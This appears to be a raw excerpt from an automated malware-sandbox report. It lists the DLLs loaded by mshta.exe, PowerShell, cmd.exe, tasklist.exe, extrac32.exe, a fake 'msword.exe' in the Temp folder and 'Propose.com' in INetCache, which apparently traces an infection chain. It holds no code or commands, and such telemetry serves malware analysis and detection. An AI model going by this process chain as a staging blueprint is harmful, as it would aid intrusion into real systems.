Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: policymanager.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: appresolver.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: pcacli.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kdscli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: iconcodecservice.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textinputframework.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coreuicomponents.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: coremessaging.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: ntmarta.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\extrac32.exe | Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\361684\Propose.com | Section loaded: pnrpnsp.dll
